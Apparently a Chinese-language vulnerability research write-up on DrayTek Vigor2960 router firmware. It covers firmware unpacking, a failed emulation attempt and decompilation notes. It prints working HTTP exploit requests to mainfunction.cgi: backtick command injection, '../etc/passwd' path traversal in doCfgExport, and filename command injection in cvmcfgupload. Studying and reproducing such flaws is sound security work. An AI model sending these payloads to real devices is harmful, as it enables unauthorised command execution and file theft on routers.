根据漏洞通告表述为MIPS架构,可通过qemu的system模式搭建模拟系统实际bin下执行文件镜像为arm小端elf文件,拿到shell上传工具需注意平台文件格斯
尝试搭建环境但是失败
UBI文件格式镜像打包文件
` ubireader_extract_images Vigor2960_v1.4.1.all`
解包释放镜像
`ubireader_extract_files Vigor2960_v1.4.1.all `
解包释放文件
`#配置网络,创建网桥 sudo apt-get install bridge-utils sudo brctl addbr Virbr0 sudo ifconfig Virbr0 192.168.10.1/24 up #创建tap接口,添加到网桥 sudo apt install uml-utilities sudo tunctl -t tap0 sudo ifconfig tap0 192.168.10.11/24 up sudo brctl addif Virbr0 tap sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2" -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic #进入虚拟机后,配置ip地址,测试与主机的连通性 ifconfig eth0 192.168.10.2/24 up ping 192.168.10.1 -c 10 #回到主机中将squashfs-root文件夹复制到虚拟机 scp -r ubifs-root/ root@192.168.10.2:~/ mount -o bind /dev ./ubifs-root/dev mount -o bind /proc ./ubifs-root/proc ssh root@192.168.10.2 chroot squashfs-root /bin/sh 接着启动web服务成功,但未找到vpn全部启动脚本,仅搭建http服务没有任何意义 `
``POST /cgi-bin/mainfunction.cgi HTTP/1.1 Host: 192.168.1.1 Content-Length: 57 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: SESSION_ID_VIGOR= Connection: close action=commandTable&command=14¶meter=`touch test.txt` ``
v1.5.1.4
根据poc直接在action中找方法
对value写入v6缓冲区和/tmp/拼接未对字符串进行任何处理,任意文件读取
sub_11B88为向keyword_object.cfg写配置,我们不进入循环,意义不大
https://github.com/xxy1126/Vuln/blob/main/Draytek/1.md
`POST /cgi-bin/mainfunction.cgi HTTP/1.1 Host: xxxxxxxx Content-Length: 61 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Origin: xxxxxxxx Referer: xxxxxxxxxx Accept-Encoding: gzip, deflate Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 Cookie: SESSION_ID_VIGOR=7:26EB81E4EA6DC603661320EBD1C938DC Connection: close action=doCfgExport&option=/../etc/passwd-&rtick=1663484341535 `
version<1.5.1
https://cn-sec.com/archives/1423548.html
https://www.secpulse.com/archives/166775.html
反编译main函数,找到action参数的处理函数
跟进subB3E0
对照off_41408
过check函数然后v40和openssl拼接
popen执行命令
https://github.com/imjdl/CVE-2020-8515-PoC
version<1.5.1.1
https://nosec.org/home/detail/4631.html
https://bestwing.me/drayteck-vigor-vulnerability-disclosure.html
在1.5.1版本下,当访问cgi-bin/mainfunction.cgi/cvmcfgupload这个路径时,如果content type为text/x-python-script,则在filename中存在命令注入。
跟进sub_12F24
命令拼接触发点如下
``POST /cgi-bin/mainfunction.cgi/cvmcfgupload?1=2 HTTP/1.1 Host: xxx.xxx.xxx.xxx:xxxx Content-Length: 174 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh,en;q=0.9,zh-CN;q=0.8,la;q=0.7 Connection: close ------WebKitFormBoundary` Content-Disposition: form-data; name="abc"; filename="t';id;echo '1_"` Content-Type: text/x-python-script` ------WebKitFormBoundary--` ``
https://github.com/peanuts62/bug\_poc
DrayTek Vigor2960 1.5.1.2
DrayTek Vigor2960 1.5.1.2
- END -